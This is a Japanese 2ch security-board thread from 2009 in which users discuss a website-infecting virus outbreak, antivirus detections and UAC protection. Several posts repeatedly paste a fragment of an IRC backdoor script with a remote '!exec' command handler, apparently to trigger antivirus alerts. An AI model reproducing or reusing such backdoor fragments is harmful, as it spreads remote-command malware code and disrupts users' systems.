908 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:16:46 ]
ん?専ブラなら無反応でおk?

次スレこれ?
pc11.2ch.net/test/read.cgi/sec/1242415108/

909 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:16:53 ]
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
n0=on 900:text:!exec*:*:{.notice $nick Execut comanda: $2-

910 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:16:58 ]
>>866
これなら先生も反応してくれるのにw

>>852
このウイルス機会に7の導入はスムーズに行くかもね



911 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:17:31 ]
>>883
878じゃないけどさっき先生アップデートしたら反応するようになっちゃった
ついでにbbs2chreaderの表示もちょっとおかしな事に・・・
既読の表示されなくなっちゃた

912 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:17:35 ]
ギコナビで見てたけどノートン2009が反応したので、
今VirtualBox+ubuntu+FireFoxで見てる。

913 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:17:44 ]
>>909
お前まじで氏ね

914 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:17:53 ]
次スレ立てる奴は重複防止の為、宣言する事!

どうする?削除依頼出ているスレを実質6として使うか
新しく立てるか?

915 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:17:57 ]

lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
n0=on 900:text:!exec*:*:{.notice $nick Execut comanda: $2-

lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
n0=on 900:text:!exec*:*:{.notice $nick Execut comanda: $2-

lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
n0=on 900:text:!exec*:*:{.notice $nick Execut comanda: $2-

916 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:18:05 ]
>>910
まさか…そのために奴らが動い

917 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:18:06 ]
専ブラで反応した
また貼った奴いるなぁめんどくせ

918 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:18:41 ]
専ブラのログのフォルダをスキャンから除外しとけばいいだけじゃん

919 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:18:42 ]
>>911
ログの削除

920 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:18:45 ]
>>892
VistaでもUAC切った奴が感染したって報告が同人スレのほうであったみたい
でもjavascriptにはNT6系(Vista、Win7)の判定で狙われないわけでUACがONかOFFかは関係ないと思うんだけど
そこらへんがよく分からない



921 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 13:18:45 ]
てかさ、avast入れてても反応しないよ

922 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:18:46 ]
avast入れてJaneで見てるけどまったく反応しないんだが…

923 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:18:49 ]
未だに2chのログで検知誤爆してる奴ってなんなの?死ねよ

924 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:18:49 ]
気にしない 気にしない

925 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:18:57 ]
愉快犯がやってるっぽいね、今さらだけどここID無しなのね
IDあぼーんできないのか

926 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:19:13 ]
avastはここに落ちてるのは拾わないな

927 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:19:22 ]
騒がれだしたら急に嬉々として張り出したな
ばかか

928 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:19:38 ]
>>902
sqlsodbc.chm を利用しない方法はいくらでもあるだろうけど、
UACに反応せずシステムを書き換える方法は一つもない。
どんな亜種が出てきてもVistaなら大丈夫と言い切れる。

929 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:19:39 ]
avast入れててギコで見てるが、なんも反応ないぜよ?

930 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:20:00 ]
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
n0=on 900:text:!exec*:*:{.notice $nick Execut comanda: $2-


例外設定くらいしておけよカスどもww



931 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:20:11 ]
avast入れてjane使ってるが何も反応ない

932 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:20:27 ]
会社のマシンやられたってやつ

これで通報しておけよ

www.ipa.go.jp/security/format/report-format.html

933 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 13:20:38 ]
専ブラで反応しないからfirefoxでこのスレ見たけど反応しなかった

934 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:20:45 ]
>>759
冷静に考えたら納得した、すまんw

935 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 13:20:45 ]
AviraでJaneだけど反応しないぜ


936 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:21:02 ]
あら?俺のノートン先生、朝アップデートかけたけど無反応だな。
起きろよノートンじいちゃん!

いや、起きないのが普通なのか?どっちやねん。

937 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:21:53 ]
CPUが大きく上下してる・・・。
>>866ってなんなの?
専ブラでもだめなのか

938 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:22:27 ]
AVGもスルーなの?

939 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:22:30 ]
>>932
まピョーん☆

940 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:22:36 ]
起きたら誤検知w>>936




941 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:22:58 ]
専ブラでは感染しないよ

942 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:22:58 ]
無知が雪崩れ込んできてる訳だが

943 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:23:02 ]
ニュー速は豚しか騒いでないのな

944 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:23:04 ]
avast以外はほんとにどうしようもないな

945 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:23:15 ]
>>940
寝てて良いわけね。

946 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:23:22 ]
>>937
専ブラで設定しれ

947 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:23:29 ]
ノートン先生さっきからなんか遮断しまくってるけど

948 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:23:50 ]
ここのコードだけで感染しますん

949 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:23:51 ]
こういう時のために、日頃からエロ画像や動画を蓄えておくのが大事なんだよな
備えあれば憂いなし

950 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:23:53 ]
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
n0=on 900:text:!exec*:*:{.notice $nick Execut comanda: $2-



951 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:24:13 ]
あ・・・らぶれたー・・・

952 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:24:41 ]
>>950
は?お前何なの?

953 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:25:04 ]
img2.pict.com/01/18/06/f2cc3c3e9c355a5631783c9669/SOqD0/2zcg.gif

954 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:25:32 ]
重要情報を勝手に外部に送信するプログラムとかも仕込まれるのかな?
pixivの管理者が感染してpixivユーザーのメアドとIDがセットで流出したら阿鼻叫喚の地獄絵図になりそう。
(エロ絵描いてる人とか特に)

個人情報を登録してるショップや企業も情報が漏れたりして。



955 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:25:52 ]
>>948 どっちなのか、わかりますん

956 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 13:26:05 ]
誰かコイツ通報しろよ

957 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:26:08 ]
コード貼ってるやつ抽出して規制議論でいいだろ
いちいち誰かが反応して話が途切れる

958 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:26:10 ]
Outpostでシステム全体のルールとして設定したからもう安心だ

959 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:26:50 ]
2chにいれば安全だな

960 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:27:43 ]
>>954
pixivは今回の騒ぎに全然対応してくれてないみたいだからもし実現するとエラいことになるな



961 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:28:06 ]
2ちゃんねるが侵されたら
ねらー全滅か?

962 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:28:43 ]
>>960
そりゃpixivは感染してないんだから無関係だし。
対応とか意味分からん。

963 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:28:44 ]
>>961
携帯でアクセスすればおk

964 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:29:05 ]
情報抜かれてもへっちゃらな人はモーマンタイ?

965 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:29:35 ]
たらればの話は情報混乱するからやめとけ

966 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:29:35 ]
おう

967 名前:947 mailto:sage [2009/05/16(土) 13:29:43 ]
あーごめん、ログちゃんと読んでなかった
つか自動あぼんされてた
コード貼ってあったのか、自己解決

968 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:29:49 ]
2ちゃんねるが侵されたらIEなんかで見たらだめだろうが
専ブラで見ている限り2chや対応掲示板は安全

969 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:30:01 ]
>>915
これって他のスレでもたまに見るけどなんなの?

970 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:31:06 ]
>>969
ノートン先生に宛てたラブレター



971 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:31:21 ]
一日5人前後の訪問者しかいないサイト持ちで
半年以上更新してなかったが
ある意味良かったのかもしれんな

972 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:31:23 ]
数ある俺のセキュリティソフトを幾ら駆使しても未知のウィルスには無意味なんですね

973 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:31:56 ]
変なこと聞くけど、Live2chも専ブラだよね?

974 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:32:10 ]
関西在住だけど神戸のインフルエンザよりこっちのが怖いよぉ

975 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:32:12 ]
>>970
ノートン先生にだけ反応する〜みたいなやつか、俺には関係ないな

976 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:32:13 ]
そんあコード貼られるのも想定内

977 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:32:14 ]
>>961
日本のネットワークがマヒ状態。

978 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:32:16 ]
てか、2chのサーバーを運営している会社もやられてたような・・・

979 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:32:18 ]
>>972
Vista使えばいい。別に7でもいいけど。

980 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:32:24 ]
同人スレの人達が何人か「pixivトップでウィルス注意喚起してくれ」ってメールしたけど
総スルー中らしい
pixivやってるひとはサイト持ち多いだろうし
現にランカーで東方大手サークルのサイトが感染



981 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:32:49 ]
>>706
更新日なんて・・・
そのファイル保護下に入っているんだっけ?
ないから感染するんだよな。

982 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:33:08 ]
こええええええ

983 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:33:17 ]
>>979
今のうちだけじゃね?

984 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:33:52 ]
恐怖はいつまで続く

985 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:33:54 ]
>>980
そりゃスルーするだろ。pixiv関係ないもん。
何かウイルスが流行る度にpixivに注意喚起させる気かよ。

986 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:33:59 ]
埋めますか

987 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:34:14 ]
ソースチェッカーオンラインが感染したら大変なことになりそう

988 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:34:33 ]
次スレは?

989 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:34:34 ]
ニュー速にスレが立ってもおかしくないレベル

990 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:34:38 ]
ドリキャスとキーボードこの前売っちまったw



991 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:34:40 ]
ほんとに次スレここでおk?
pc11.2ch.net/test/read.cgi/sec/1242415108/

992 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:34:58 ]
>>983
UACがあるから根本的にXP以前とは違う。
このウイルスをVistaに感染させることはできないよ。

993 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:35:09 ]
ume

994 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:35:13 ]
1000

995 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:35:39 ]
1000

996 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:35:42 ]
次スレ(゜Д゜≡゜Д゜)?どこ?

997 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:36:06 ]
1000なら2ちゃんも感染

998 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:36:10 ]
スレ眺めてるだけで一日が過ぎそう

999 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:36:15 ]
1000

1000 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:36:25 ]
∞      ∞
  ∞
 ∞   ∞
     ヽ[゚д゚]ノ シンガタテフテフ
       [_]
       < \



1001 名前:1001 [Over 1000 Thread]
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。






[ 新着レスの取得/表示 (agate) ] / [ 携帯版 ]

前100 次100 最新50 [ このスレをブックマーク! 携帯に送る ] 2chのread.cgiへ
[+板 最近立ったスレ&熱いスレ一覧 : +板 最近立ったスレ/記者別一覧]( ´∀`)<206KB

read.cgi ver5.27 [feat.BBS2 +1.6] / e.0.2 (02/09/03) / eucaly.net products.
担当:undef